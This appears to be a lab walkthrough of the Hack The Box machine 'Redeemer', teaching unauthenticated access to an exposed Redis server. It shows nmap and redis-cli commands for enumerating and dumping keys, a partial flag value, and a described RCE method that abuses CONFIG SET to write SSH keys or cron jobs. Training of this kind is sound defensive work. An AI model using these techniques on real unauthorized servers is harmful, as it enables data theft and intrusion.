⚠️ Legal Disclaimer: This content is for educational purposes only. Always ensure you have proper authorization before testing

Redeemer introduces Redis — a high-speed in-memory key-value store widely used for caching, session storage, and message brokering. When Redis is exposed on the network without authentication (a common misconfiguration), an attacker can dump all data stored in memory, enumerate the database, and in advanced scenarios even achieve remote code execution via config manipulation.

Tools: nmap · redis-cli  ·  Difficulty: Very Easy  ·  OS: Linux
01 — What You Will Learn
SkillWhy it matters
Scanning non-standard portsRedis default port (6379) is not in Nmap's top 1000 — full-range scans are essential
Redis CLI interactionDirect database access without credentials on exposed instances
Key enumeration and data extractionCached data often contains session tokens, credentials, and PII
Redis data structuresUnderstanding strings, lists, hashes, and sets in a NoSQL context
02 — Reconnaissance

Redis runs on port 6379, which falls outside Nmap's default top-1000 ports. Always use -p- on HTB machines.

Nmap scan
nmap -sV -sC -p- --min-rate 5000 10.129.x.x
Relevant output
PORT STATE SERVICE VERSION 6379/tcp open redis Redis key-value store 5.0.7

What you're seeing: Redis 5.0.7 on its default port. No authentication banner, no TLS. This version predates mandatory auth enforcement — it will accept unauthenticated connections by default.

⚠  Redis is designed to run on trusted internal networks only. It has no built-in encryption and auth was only made default in Redis 7+. Exposed Redis instances are a frequent source of critical data breaches in cloud environments.
03 — Connecting to Redis
Install redis-cli if needed
sudo apt install redis-tools
Connect
redis-cli -h 10.129.x.x
Basic server info
10.129.x.x:6379> info server # Server redis_version:5.0.7 os:Linux 5.4.0-77-generic x86_64 tcp_port:6379 ...
ℹ  The info command dumps server metadata — OS, version, memory usage, connected clients, and persistence settings. This is valuable recon in a real engagement.
04 — Enumerating the Database
List all databases with stored keys
10.129.x.x:6379> info keyspace # Keyspace db0:keys=4,expires=0,avg_ttl=0
Select the database and list all keys
10.129.x.x:6379> select 0 OK 10.129.x.x:6379> keys * 1) "numb" 2) "temp" 3) "flag" 4) "stor"
Retrieve the flag value
10.129.x.x:6379> get flag "03e1d2b376c37ab3f5019c999b..."
✓ Submit the flag string to complete the machine.
05 — Redis Command Reference
CommandWhat it does
infoDump server information and statistics
info keyspaceShow databases and their key counts
select <db>Switch to a specific database (0–15)
keys *List all keys in the current database
get <key>Retrieve the value of a string key
type <key>Check the data type of a key (string, list, hash, set)
hgetall <key>Get all fields of a hash key
lrange <key> 0 -1Get all elements of a list key
config get *Read server configuration (useful for RCE via config set)
dbsizeCount keys in the current database
06 — Key Takeaways
Exposed Redis instances have caused some of the most significant cloud data breaches in recent years. A single unauthenticated connection can dump session tokens, API keys, and user data cached from an entire web application.
ConceptReal-world relevance
Always scan all portsRedis on 6379 is outside the default Nmap range — full port scans are non-negotiable
No-auth Redis = full data accessEvery cached session, token, or object in memory is immediately readable
RCE via config manipulationOn writable Redis, CONFIG SET dir + CONFIG SET dbfilename + SAVE can write arbitrary files — including SSH authorized_keys or cron jobs
Cloud exposure riskRedis bound to 0.0.0.0 with no auth and a misconfigured security group is a critical cloud finding